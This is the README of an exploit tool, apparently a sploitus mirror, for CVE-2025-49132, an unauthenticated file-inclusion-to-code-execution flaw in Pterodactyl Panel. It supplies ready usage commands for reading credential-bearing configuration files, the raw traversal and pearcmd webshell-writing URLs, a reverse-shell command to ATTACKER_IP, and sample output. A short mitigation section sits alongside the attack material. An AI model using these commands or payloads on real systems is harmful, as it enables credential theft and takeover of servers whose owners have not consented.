Share
## https://sploitus.com/exploit?id=2E0E1726-1469-55A5-A3D1-66C2F369E70F
# CVE-2025-49132 - Pterodactyl Panel Exploit

> โš ๏ธ **Disclaimer**: This repository is created for **educational and research purposes only** as part of my security research to understand and document CVE-2025-49132. All credit for the vulnerability discovery goes to the original researcher(s).

```
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Pterodactyl Panel - Unauthenticated LFI to RCE Exploit
```

## ๐Ÿ“‹ Description

**CVE-2025-49132** is an **Unauthenticated Local File Inclusion (LFI)** vulnerability in Pterodactyl Panel that can be escalated to **Remote Code Execution (RCE)** via PHP's `pearcmd.php`.

The vulnerability exists in the `/locales/locale.json` endpoint, which fails to properly sanitize the `locale` and `namespace` parameters, allowing attackers to read arbitrary PHP configuration files and achieve code execution.

## ๐ŸŽฏ Affected Versions

| Status | Version |
|--------|---------|
| โŒ Vulnerable | = 1.11.11 |

## โšก Features

- **LFI Mode**: Read PHP configuration files (database credentials, APP_KEY, etc.)
- **RCE Mode**: Remote code execution via `pearcmd.php` LFI2RCE technique
- **Interactive Shell**: Persistent shell for multiple command execution
- **Single Command**: One-shot command execution
- **Pretty Output**: Color-coded, formatted output for better readability

## ๐Ÿ“ฆ Installation

```bash
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Install dependencies
pip install requests
```

### Requirements

- Python 3.6+
- `requests` library
- `curl` (for RCE mode)

## ๐Ÿš€ Usage

### LFI - Read Configuration Files

```bash
# Read database configuration
python exploit.py -u http://target.com --read -p ../../config -f database

# Read application configuration (contains APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Read other configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail
```

### RCE - Remote Code Execution

```bash
# Single command execution
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Interactive shell mode
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Reverse shell
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
```

### Common PEAR Paths

| Distribution | Path |
|--------------|------|
| Debian/Ubuntu | `../../../../../../usr/share/php` |
| SUSE/OpenSUSE | `../../../../../../usr/share/php/PEAR` |
| CentOS/RHEL | `../../../../../../usr/share/pear` |
| Alpine | `../../../../../../usr/share/php8` |

## ๐Ÿ“– Arguments

| Argument | Description |
|----------|-------------|
| `-u, --url` | Target URL (required) |
| `-p, --path` | Path traversal for LFI or PEAR path for RCE |
| `-f, --file` | PHP file to read (without .php extension) |
| `--read` | Enable LFI read mode |
| `--rce` | Enable RCE mode |
| `--cmd` | Command to execute (single execution mode) |
| `--sdir` | Directory to write shell (default: /tmp) |
| `--sname` | Shell filename (default: shell) |

## ๐Ÿ”ฌ How It Works

### LFI (Local File Inclusion)

The vulnerable endpoint `/locales/locale.json` accepts `locale` and `namespace` parameters:

```
GET /locales/locale.json?locale=../../config&namespace=database
```

This allows reading any PHP file that returns an array, including Laravel configuration files.

### RCE (Remote Code Execution)

The exploit chains LFI with `pearcmd.php` to achieve RCE:

1. **Stage 1**: Use `pearcmd.php`'s `config-create` command to write a PHP webshell
   ```
   /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/+/tmp/shell.php
   ```

2. **Stage 2**: Include the written shell via LFI
   ```
   /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=
   ```

## ๐Ÿ“ธ Screenshots

### LFI - Reading Database Configuration
```
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  DATABASE CONFIGURATION
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
[+] Configuration extracted successfully!
```

### RCE - Command Execution
```
[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------
```

## ๐Ÿ›ก๏ธ Mitigation

1. **Update** Pterodactyl Panel to version **1.11.11** or later
2. Implement proper input validation on `locale` and `namespace` parameters
3. Use allowlist for valid locale/namespace values
4. Restrict PHP's `register_argc_argv` directive

## โš ๏ธ Disclaimer

This tool is provided for **educational and authorized security testing purposes only**. 

- Only use this tool on systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse or damage caused by this tool

**Use responsibly and ethically.**

## ๐Ÿ“š References

- [Pterodactyl Panel Official](https://pterodactyl.io/)
- [Pterodactyl Panel Github](https://github.com/pterodactyl/panel/tree/1.0-develop/config)
- [CVE-2025-49132 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-49132)
- [CVE-2025-49132: Pterodactyl Panel Allows Unauthenticated Arbitrary Remote Code Execution](https://www.miggo.io/vulnerability-database/cve/CVE-2025-49132)
- [PEAR LFI to RCE Technique](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html)
- [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator)
- [Local File Inclusion to Remote Code Execution (RCE)](https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a)

## ๐Ÿ“ Changelog

- **v1.0.0** - Initial release
  - LFI configuration reading
  - RCE via pearcmd
  - Interactive shell mode
  - Pretty formatted output

---

**โญ Star this repo if you found it useful!**